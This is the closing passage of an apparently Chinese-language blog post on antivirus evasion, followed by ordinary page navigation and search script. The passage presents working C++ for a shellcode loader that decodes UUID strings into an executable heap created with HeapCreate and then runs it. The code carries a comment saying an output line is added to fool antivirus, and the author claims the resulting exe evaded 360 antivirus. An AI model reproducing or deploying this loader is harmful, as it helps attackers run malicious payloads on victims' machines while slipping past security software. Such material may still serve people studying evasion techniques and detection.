<span class="type">int</span> dwNum = <span class="built_in">sizeof</span>(buf) / <span class="built_in">sizeof</span>(buf[<span class="number">0</span>]);</span><br><span class="line">	<span class="comment">// 创建一个堆，并返回一个句柄</span></span><br><span class="line">	HANDLE hMemory = <span class="built_in">HeapCreate</span>(HEAP_CREATE_ENABLE_EXECUTE | HEAP_ZERO_MEMORY, <span class="number">0</span>, <span class="number">0</span>);</span><br><span class="line">	<span class="keyword">if</span> (hMemory == <span class="literal">NULL</span>) &#123;</span><br><span class="line">		<span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="comment">// 在堆中分配 1024 字节的内存，并返回指向这段内存的指针</span></span><br><span class="line">	PVOID pMemory = <span class="built_in">HeapAlloc</span>(hMemory, <span class="number">0</span>, <span class="number">1024</span>);</span><br><span class="line">	</span><br><span class="line">	DWORD_PTR CodePtr = (DWORD_PTR)pMemory;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">for</span> (<span class="type">size_t</span> i = <span class="number">0</span>; i &lt; dwNum; i++)</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="keyword">if</span> (CodePtr == <span class="literal">NULL</span>) &#123;</span><br><span class="line">			<span class="keyword">break</span>;</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="comment">// 将字符串转换成 UUID，并将结果存储在指向内存的指针 CodePtr 中</span></span><br><span class="line">		RPC_STATUS	status = <span class="built_in">UuidFromStringA</span>(<span class="built_in">RPC_CSTR</span>(buf[i]), (UUID*)CodePtr);</span><br><span class="line">		<span class="keyword">if</span> (status != RPC_S_OK) &#123;</span><br><span class="line"></span><br><span class="line">			<span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">		&#125;</span><br><span class="line">		CodePtr += <span class="number">16</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">if</span> (pMemory == <span class="literal">NULL</span>) &#123;</span><br><span class="line">		<span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	((<span class="built_in">void</span>(*)())pMemory)();</span><br><span class="line">    <span class="comment">//加个输出来骗杀软</span></span><br><span class="line">	cout &lt;&lt; <span class="string">&quot;Hello World!\n&quot;</span>;</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>其中涉及到一个<code>UuidFromStringA</code>函数，该函数的作用是将一个字符串表示的 UUID 转换为一个 UUID 结构体类型的变量。其中，第一个参数是一个字符串，表示要转换的 UUID，第二个参数是一个指向 UUID 结构体类型的指针变量，表示转换后的结果。</p>
<p>生成的exe成功在360免杀（2023.6.15测试）</p>
<p><img src="image-20230615221347000.png" alt="image-20230615221347000"></p>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/post/agent%E5%86%85%E5%AD%98%E9%A9%AC%E5%AD%A6%E4%B9%A0/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>上一页</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime mr-10" title="更新时间"></i>
              2023-06-15 23:25:43
            </span>
            
                  <span class="post-tags">
                    <i class="iconfont icon-tags mr-10" title="标签"></i>
                    
                    <span class="span--tag mr-8">
                      <a href="/tags/%E5%85%8D%E6%9D%80/" title="免杀">
                        #免杀
                      </a>
                    </span>
                    
                  </span>
              
          </div>
          <div class="post-foot-prev">
            
              <a href="/post/%E4%B8%80%E4%B8%AA%E7%AE%80%E5%8D%95%E7%9A%84%E5%87%86%E6%8E%A5%E5%85%A5/" target="_self">
                <span>下一页</span>
                <i class="iconfont icon-chevronright"></i>
              </a>
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">目录</div>
    <div class="catalog-content">
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E7%AE%80%E5%8D%95%E7%9A%84%E5%8A%A0%E8%BD%BDshellcode"><span class="toc-text">简单的加载shellcode</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%85%8D%E6%9D%80%E6%93%8D%E4%BD%9C"><span class="toc-text">免杀操作</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%94%B3%E8%AF%B7%E5%8F%AF%E8%AF%BB%E5%86%99%E5%86%85%E5%AD%98%E9%A1%B5"><span class="toc-text">申请可读写内存页</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BF%AE%E6%94%B9%E5%AF%BC%E5%85%A5%E5%9C%B0%E5%9D%80%E8%A1%A8"><span class="toc-text">修改导入地址表</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8HeapCreate%E6%9B%BF%E4%BB%A3VirtualAlloc"><span class="toc-text">利用HeapCreate替代VirtualAlloc</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#shellcode%E5%8A%A0%E5%AF%86"><span class="toc-text">shellcode加密</span></a></li></ol></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        







      </div>
    
  </div>


        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          
              <a title="github" target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">
                <i class="iconfont icon-github"></i>
              </a>
              
        </li>
        
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Copyright © 2024 Oranges</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="搜索...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>首次搜索，正在载入索引文件，请稍后……<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>没有找到内容，请尝试更换检索词。<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>未找到search.xml文件，具体请参考：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>请求失败，尝试重新刷新页面或稍后重试。<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + %E6%81%B6%E6%84%8F%E4%BB%A3%E7%A0%81%E9%80%83%E9%80%B8%E5%AD%A6%E4%B9%A0 + '&url=' + http%3A%2F%2Fexample.com%2Fpost%2F%25E6%2581%25B6%25E6%2584%258F%25E4%25BB%25A3%25E7%25A0%2581%25E9%2580%2583%25E9%2580%25B8%25E5%25AD%25A6%25E4%25B9%25A0%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=http://example.com/post/%E6%81%B6%E6%84%8F%E4%BB%A3%E7%A0%81%E9%80%83%E9%80%B8%E5%AD%A6%E4%B9%A0/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
